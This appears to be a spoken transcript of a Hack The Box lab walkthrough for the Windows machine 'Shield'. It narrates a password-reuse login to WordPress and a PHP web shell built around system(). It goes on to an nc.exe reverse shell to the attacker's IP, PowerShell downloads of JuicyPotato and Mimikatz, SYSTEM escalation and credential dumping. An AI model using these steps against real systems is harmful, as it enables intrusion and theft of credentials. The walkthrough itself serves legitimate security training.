Hey guys, and welcome to another video where we hack the box. We are going to be doing Shield in this video, and this one it was a bit hard because it's a Windows machine and I don't really do or haven't done many privilege escalations with Windows. I can get into the box, but when it comes for me to go from user to administrator or root, I fail a lot. So I do apologize for already have completed this one. I am re-recording this video because I didn't really like last video that I recorded. It was actually 2 hours and 30 minutes, and most of it was a lot of unnecessary things. So let's go ahead and get started. We are gonna join this, open our Terminator, and we are going to go into hack the box. Okay, so let's go ahead and make a directory, and we're going to be calling it Shield. And let's go inside there. So as always, let's go ahead and do an nmap scan sudo nmap. Before we do that, so while that is running, we can actually... Oh, it's back. Never mind. That was pretty fast. So let's copy that. Paste the results there. So we have a web server. Let's go into that one. And it was IIS, or Internet Information Services. If we click here, it'll take us to the home page of this Microsoft server. And if we try to view the page source, there's nothing much in there. Just that link, the image, and that is pretty much it. So what we want to do next is we want to try and brute force or enumerate the directories. So for that, we are going to be using GoBuster. Before we actually do that, I keep forgetting to do that first. So GoBuster tech-u for the URL. And actually tech-w for the word list that we want to use. And let's use the lowercase medium text. And we are also going to be redirecting any errors to dev null. And I believe it's tag X, where we can just specify any files. I guess that's it. Maybe it wasn't tag X. Oh. Totally forgot to do that. Tell it that we are going to be in directory mode. So it is tag X. Let's just do it again. PHP, HTML, text, JSON, JS, XML. And that should be it. While that's going, we also need a Nikto scan. And we are going to be creating a Nikto.log for that one. See what it returns there. So while that's running, let's go ahead and make some space here. Okay, so apparently we found a WordPress site in there. So let's head over there. Okay, so this machine, or this company, apparently it's called Shields Up, or this service. Apparently they are the world's biggest provider of electric trucks and voted the most innovative company of 2019. These links don't seem to do much or anything at all. This one just redirects back to the homepage, which is this one, and this one goes into a blog, so maybe we can take a look at that. Oh, here's the blogs. So we got 3 blogs. That one does the same thing. Contact us doesn't seem to do anything. We could look at the page source. See if we find anything interesting here. And here we get a little glimpse of the file structure. So there's a wp-content, and we can actually take a look at, if you have never used WordPress before, we are going to be taking a look at the structure and where things go in a bit. But other than that, there's nothing that pops out, to me at least, from here. Okay, so there's nothing here. Let's go into the blog. And here we can see that we actually have an admin user. And we have a login page. So let's follow that. And if we want, we could go and read more about these things. Let's see if, well, it doesn't seem like there's gonna be anything new, at least. in here. There is nothing interesting here. Okay. That is that. Let's. So we have some form here. Previous screen. And we seem to have a comment here by the admin. He apparently might buy some new tires for his vehicle, but nothing else. Okay, so we have this admin page, or this login page, and we can try to put in some admin passwords. Maybe they have really weak passwords. Seems like they don't. Default WordPress admin. So we see that we tried this one already, and that's the default password. Already tried this one. These are for something else, I think. So yeah, the default login for that one is that. Admin password, we tried that already and it did not work. Let's go ahead and let's go to the previous vaccine. And let's try to see if we can use any of those passwords here. Obviously, I don't think that one's gonna work because it's not an FTP, and it doesn't. We can then try this one, and nothing happens there. Then we can try QWERTY. That one was the previous admin's password, and it's not here. And the last one that we have is password in Leetspeak or whatever. And looks like we actually have a winner. We are now logged in as admin. So apparently I was wrong when I said in the last video that this box wasn't, or the previous box was the actual last box that we were going to be working with Megacorp. So apparently this one is also part of that. So that's interesting. All right. And doesn't seem like we're going to be finding anything else with this one. So let's just put it in there. All right. Okay, so now that we're in, there's a couple things that we can do. Because WordPress runs on PHP, we can upload a piece of code that will allow us to execute PHP in the back end and grant us access through a reverse shell into the system. So there are a couple ways that we can do this. The first one is through themes, and the second one is through installed plugins. So if we go to themes here, we go to add new, and then upload theme. We see that we can browse and upload any file. Same thing is true if we were go to actually add new plugin, upload plugin, and we see that we get the same box right here, the same form for us to be able to upload. And these are the current stuff that we have, apparently. They have very weird names. But anyway, let's go ahead and write our own PHP code. So in this one, we're going to be doing something kind of cool. We're going to be writing our own PHP script that is going to allow us to run a web shell through the browser. So that's kind of cool. So let's open up Sublime, and we're going to name it WebShell PHP. To start a block of code through PHP, you need to encapsulate your code like this. This tells the interpreter that you want to start a code block for PHP, and this is how you end it. So we are going to be using the get command, so we first have to make sure that it is set that the get variable, has something inside. If it doesn't, then we aren't going to display anything. But if it does, there is this function called system, and it takes a command. So all we gotta do is pass in our CMD through. Now this function returns the last line through here, and if we wanted to see what the return value for the actual command line, we can actually catch it through there and then display those if we wanted to. We could probably use the return value just to tell us if it succeeded or if it didn't succeed. So we are just gonna say command failed, so that we know what happened. So these, if you don't know, this is how we concatenate different strings and make them into one. Concatenate is a fancy word for saying join, kinda, I guess. So yeah. And now this should be good for now, but I actually want to take it a little bit further than that and actually create a form that we can type things in, and a button that will allow us to post or send our request to the server. So for that we need to create a HTML website. So if you have never done that, this is your lucky day. WebShell. Just name that WebShell. We don't really need any metadata here. I guess that's that. We do need the body, and inside the body, we're gonna paste this in there, and let's not give it a background color because I don't want to deal with changing the color of the text, but we are going to be centering this, so we're going to be using some divs. So here it's going to start, and here it's going to end, and we're just going to say align equals center, and up here we're going to start a form right here. And we're going to have a couple things. So the action is going to be, this just means that when you press the submit button on the form, it's going to use this field action to redirect you. But since we're using the hashtag symbol here, it's going to use the same website, or the same page that we are on, webshell.php. But you could totally do like some people do, like webshell.inc, and that would be in a separate directory, and once you press return or whatever, it'll send you to this website, and this web page. And that web page is going to have all the code inside to process that information. But we're just going to do it in here. And our process information is right here. There we go. All right. So, one more thing. We also want to tell it what method we want. And this is going to be get. I believe it can be uppercase, lowercase, sorry. So that doesn't matter. We are going to have a label here. It's just going to say enter command. And then we're going to have our input. No, not INS. And the type of input is going to be text. And the name for this text is going to be CMD for our command. Remember that this one has to match this one. Okay? Very important. And we are also going to have another input. And this one is going to be type submit. And the name is going to be I guess submit. No. Sure. Submit. And the value. This is what the actual button is going to show as the text. So we're just going to say go or something. And here, the value, or is it value, or maybe you can do placeholder. And we're just going to say CMD. And you'll see what that does. It just places, if you don't have anything in the text box, it'll just show CMD and maybe ... or something like that. Okay, and that should be everything that we want to do here. So let's go ahead and save that. go back to here. Let's go and add a new plugin. It doesn't matter which one, plugin or theme. They're both gonna go into the same area, and we can actually. This is where we're gonna be looking at how you would figure out where it goes if you don't know where it went. Because normally it goes to like some upload section, but in this case we don't know where that is at this moment. So let's go to hack the box, shield, actually not shield, YouTube, shield, and WebShell. Let's open that. And normally you would just change the name from WebShell to something else, so that one, if they have Windows Defender or a firewall or something like that, it wouldn't get caught. And two, if there's other people going into this box, and if you don't want to have them use your web shell, you could name it something else. But they'll probably figure it out anyway. So it says it's uploaded, and here we can see that it has an error because it tried to install it, but it failed because it's not a proper installer for our plugins or our themes, which is totally fine. When I first ran through this one, my first time going through it, I was like, oh shit, did I do something wrong? It did not work, but it did. It totally uploaded everything. So where did it go? Because if we go here, our scans didn't show anything else. And we could see, like, is there like a uploads? No. So where did it go? Is there like a plugins? No. Well, that, my friends, I'll show you how you can figure it out. So we're gonna use Google, and we're gonna just ask Google a question. Where, or let's see, WP folder structure, and it should be the very first one. It says beginner's guide to WordPress file and directory structure. That's exactly what we need if we are beginners and we don't know where things are within WordPress. So let's go down, down, down. Here we see some top level. This is pretty much the root level of the WordPress website. And we can see that we have the index.php, which is where we were over here. And we see that we have WP admin, and that's that right there. And we also have well, not configuration files. We don't care about those right now, at least. But this one, we care about the WP content. So in WordPress stores all uploads, plugins, and themes in the WP content folder. It is generally assumed that you can edit files and folders inside of WP content folder. However, this is not entirely true. So it may or may not be true. So we have to check that ourselves. And here just tells you that right there. So we have themes, plugins, and uploads. And if you are going to install themes, that's where you would find them once you install them. And if you're going to be installing anything else, That's where, like if you were installing a plugin, then it's going to go into the plugins folder. wpcontent folder, plugins. But since we ran it and it did not install anything because it wasn't an installer, it put it in the uploads section. So we can assume that we need to go into wp-content uploads. So let's do that. Press enter, and now we see that it's not a 404 anymore, it's a 403. And we don't have access to that, but all we gotta do is just type in the file name of our web shell, which was WebShell PHP. And we see that we get a little nice interface for our thing. And we see that our button says go, and we have a little placeholder here, cmd ... So let's put in the command of who am I, press enter, and we see that we are the NT authority user. So it works. Let's do a dir, and let's see what's in there. Well, we found our PHP shell. We found a js.exe, so apparently there's been people here before. And I know exactly what this is, and I'll show you exactly what that is in a bit. But thanks to them, we actually have, well, they have a shell.bat and an ncexe, that's netcat. So we can totally do, we don't have to upload anything ourselves. They already did that for us. Thank you, people. But all we have to do is just use that nc.exe and get us a reverse web shell. So how do we do that? So all we gotta do is call nc.exe and we are gonna do dash and nv, and then we're gonna do our IP, our port, tac e, and then cmd exe. So what is our ID? I mean our IP. So if config tune 0 1010 14 11. Oop. We go here, paste that in, and let's use port 9001. And let's not forget that we need to use netcat on our end and listen for a connection. So let's go back to here and press go. Did it work?
Did it work?
We see this thing right here. It's still going, still thinking. So, of course it did. It definitely worked. So that's pretty much it. Oh, crap. There is no ls because it's a Windows machine. So let's see what that bash or that shell.bat was. So type shell bat. And they are calling netcat. And they are executing PowerShell. And they are connecting to this IP address and this port. Now we are here. If we run who am I, we're just the I user. So that's no fun. We want to be the authority system here. We could do a system info and see what we have here. Hostname Shield, Windows Server 2016 standard. OS version is 10. So that's probably gonna be important for us. Let's copy that. Okay, I guess before we move on, let's go ahead and annotate what we did. So I'm putting found/uploaded because we actually found it. Actually, just not put uploaded. Just say that we found it. NCXE and created a WebShell. Like that. Because we didn't really do that. We didn't upload that. So let's not say we did. Right? Yeah. So that is everything. Maybe let's have our command that we did. So it was nc.exe tech nv, our lip and our l port tech e cmd exe. So that's what we did to connect to us. And LIP is the, or let's say lhost. That's us, and that's our port. This is kind of like the same syntax that you would use with Metasploit, but we didn't use Metasploit, but whatever. So anyway, we see that it doesn't have any hot fixes here. And here we actually see that the domain is actually Megacorp. So that's interesting. It's still Megacorp. So I was wrong. But there's no hot fixes, so they have all the vulnerabilities that this particular version of Microsoft Windows Server standard would have. So at this point, you would search for that. And I happen to know, because I've already done that research, and it's going to take you forever, hours, maybe days, to figure that out, unless you go and find a walkthrough. So we know that there is a vulnerability using something called Rotten Potato, and there's a version that we're going to be using called JuicyPotato. And pretty much what happens is that it tricks the NT authority user into authenticating via NTLM. If you don't know what NTLM is, I'm not going to go too much into it, but it's pretty much a authenticator. It's before Kerberos. I believe this was the way that that Windows systems would authenticate your user and allow you into the system. So yeah, so pretty much essentially what Rotten Potato and JuicyPotato and all of those do is it tricks it. It's pretty much, we use a service, and you'll see right now we're going to be using a service, and we're going to be kind of like a man-in-the-middle attack, and we're going to be using that service to trick the NTLM to authenticate us, to negotiate a system token for us to elevate our privileges through that. Okay, that's essentially what we're going to be doing. So how do we do that? Well, let's go into here and let's search for JuicyPotato. And it should be this guy right here. And we see that we have, well, we want to go into the releases first. We want to go into JuicyPotato and just download that. Once we have that downloaded, there's something else we want to do. We want to go into CLS ID. And we can either download this this get clsid.ps1, or we can go into here, and because we are using this one, this is our Windows server that we are trying to break into, or not break into, but elevate ourselves within. These are all of the CLS IDs that we're going to be trying, or you can just choose one. We are going to be actually using this guy right here, win management. We want win management, but I'm gonna copy this guy, copy, and you see that all of these are authority system, and I guess in a normal machine, they would probably have all of these, but we might have to use the get clsid ps1 script if it doesn't work, to be able to gather all of those CLS IDs. And if you don't know what a CLS ID is, it's a global ID that it's called a class ID, and this is what identifies each service. Yeah. So let's go here, and we are gonna do another directory here. We see that we have js.exe. We could upload our own, or we could use that one. I'll show you guys how to upload it. So yeah, we're gonna do it with PowerShell. So we're gonna do PowerShell tag C. C is for command. So we're gonna be running a command, and it's gonna be a wget http, and here we actually need that again. It's going to be 10, not 19, 10, 10, 14, 11, and then the port, which is going to be 8000. And then we want the, let's call it jp.exe. And then we're going to out file jp.exe. Okay, that's what we're going to be doing. Before we actually run that, let's move from our downloads our JuicyPotato, and we're going to call it jp.exe. So we have jp.exe. Now we're going to be using Python 3 tag m to run a module, and we're going to run http.server. So now, if you have done it correctly, press enter, and we should now see jp.exe right there. Let's make sure that we annotate this guy. Copy. And let's go here. Or let's see, uploaded JuicyPotato exe into server, and we just have to run it. So how do we run it now? First, I'm gonna do jp.exe. Oh, snap. Huh. Okay, so that didn't work. Apparently our exe is at 0 bytes or 0 zymes, and that's not good. That's not good. So let's see what happened. So let's try and download it once again. I'm gonna copy the link location. And the reason why it didn't want to download it is because it's a well-known exploit. And usually, I guess, website, Firefox and all those prevent you from downloading exes, but we can probably just get around that by doing this. And there we go. We have it now. Let's just rename it and clear that. Let's do that, and then we are gonna do the Python server, and here we are gonna have to go back into the website. Hopefully it's still there, and connect. Cool. We can probably just delete jp exe. Cool, it's gone. And just do what we did last time. So let's grab this right there. Let's go back here. Paste, enter, and now we should see that it does have a size now. It's not 0. So if we just run it, it's going to give us mandatory arguments. So we have to use all of these. And we're going to be also using a couple of these right here, especially this guy. So let's get to it. jp.exe. The first one that we're going to do is tag L for the com server listen port, and it's going to be 1337. Let me know if you know what that means in the comments below. After that, we are going to run a program, and the program that we're going to be running is going to be comspec, which, if you don't know what comspec is, it's just cmd.exe. This is just the variable name within the Windows server. It's an environment variable. So we're going to do that. Then we are going to do tag A afterwards, because we want to run something else. And what we're going to be running is a command using cmd.exe. And what command are we going to be running? Well, we're going to be trying to connect to another reverse shell. So in here, we can actually do another nv-exe or nc-lnvp. Instead of 9001, we're going to say quad 9. No, actually, yeah. So that's going to be the port we're going to be listening to. We can't use 9001 because we're already using it for this current web shell or reverse shell that we have. So what now? And so now we just say ncexe tag nv our IP, which is 10 10 14 11, our port, which is 9999, and then tag E, and then just cmd.exe. And then after that, we're going to do tag T and asterisk. If you read here, it says use -T to either do T or U. We're going to be trying both. So if one fails, we can try the other one. So yeah. So we're going to be doing that. And lastly, we're going to do tag C to specify what CLS ID we want. By default, it is this one, which is bits, the service bits, whatever that is. I don't remember exactly what it is. We can probably Google it right now. But I actually want to go back to JuicyPotato. And go into CLS ID, go into the standard, and go into our management here. Copy that. Before we paste it, we're just going to delete that and just actually, it's got to be in quotations. Paste. And before we press enter, we're just going to copy it. Boom. There we go. Copy that. We're going to put it in our notes. And hopefully it works for us the first time. Let's go ahead and press enter. And it's thinking, and it liked it. It worked. But we didn't get a reverse shell. Why is that? Did we? Yeah, we had the correct everything. Maybe it didn't know. Oh, yeah, that's probably why. Because when we run CMD or ComSpec, it originally runs from Windows System 32. So we probably have to get the entire path for that one. So let's go ahead and do a little dir. So it's right there. So let's copy this. And let's go back here and put that in there. Like so. Just copy it. Paste, enter. And there we go. We've got a shell over here. So if we expand that, oops, let's do who am I, and we can see that we are authority system. We are root. That's great. Now let's go to the root of the disk and let's go into users. Let's go into administrator. Let's go into desktop. Oh, so we got a text file here. which is root txt. You know what that is. It's a flag. So let's annotate that. NT authority. Found root txt in C users and we have that. And we also found another user. We can also do a command to get all the users that this machine has, I believe. So net users. Oh, I guess it's just those. But if we go here, we can actually see that we have another user called Sandra. So let's try to get stuff. In order for us to sniff or check out for any passwords, we can use something called Mimikatz. And if you remember, I don't know if you saw, but for us at least, we have this to mim, which I'm guessing is gonna be Mimikatz. And it is. It's Mimikatz. Okay. So if you don't know where to find that, if you don't have it, let's do a Google search. And here it is. All you would have to do is go here, go to releases, and go to the zip file here. Go to save, go OK. Let's go here and let's actually move from our downloads. That's gonna be Mimikatz, and we're gonna move it here. We're just gonna make a directory called Mimi. And we're just gonna move Mimikatz to Mimi. And we are gonna use unzip because we got the zip file. We're just gonna do unzip. It's gonna get all of that stuff out. So it's right here. We're gonna go into x64. And it's right there, mimikatz.exe. So how do we get it up into the system? Easy. We are just gonna do Python server. And before actually we do that, let's clear this ls. Let's if config tune, and then let's do that so that we can actually see everything that we're going to be doing. So let's actually get out of here. We're going to do PowerShell tech-c. We're going to do wget http 10 10 14 11 8000. We're going to do mimikatz.exe. We're going to do tac out file to mimi.exe. And there we got it. We have Mimikatz now in our system. So we just gotta run that, and it's the same program. And we could do something like lsd or lsa dump sam, and we get a sam key. We get the default user, the guest user, and the administrator, and this is the NTLM hash. So that could be something. Let's copy that. And we're going to do this. And the other thing, to actually get the passwords, we are going to do SEKURLSA : logon passwords. Oh, no space. And there we go. We could just probably copy all of this stuff and just oh, damn it. Now we're gonna go back here. Copy. Bring it over here. And let's actually just do Sandra. And we can see that we have a username here. Domain name is Megacorp. Logon server is Pathfinder. We have an SID, and we have the SHA-1 hash, and some other stuff. We get the NTLM hash, but we don't need all of that because we have these credentials right there. So we can probably just do that. And we may just use that for the next one. So now let's now turn this in. All right, so now let's go and submit that flag. Put in your difficulty, submit, and woo, copy that URL and just leave it in here at the end. All right, guys. Well, I hope you guys learned a lot in this one. I'm actually at 1 hour and 15 minutes, so that's an hour less and 15 minutes than the previous session that I did for recording this one. Hopefully I'll have an easier time editing it. Thank you guys for watching. If you made it all the way to the end, let me know in the comments below if you learned anything new, anything else you did differently, or if you would do something differently, what would it be? Let me know in the comments below if there's anything that I got wrong. I'm always trying to improve and learn as I go. And yeah, what did you learn? Let me know. Let me know. If you like this video, hit that like button, press that subscribe button if you haven't already, and make sure to click on that bell icon to be notified when I post any new videos in the future. Thank you guys again, and I really appreciate it. We're almost at 300 subscribers. That's amazing. That wouldn't be possible without you guys. So thank you a lot. Really means a lot. Well, I'll see you guys next time, and stay safe.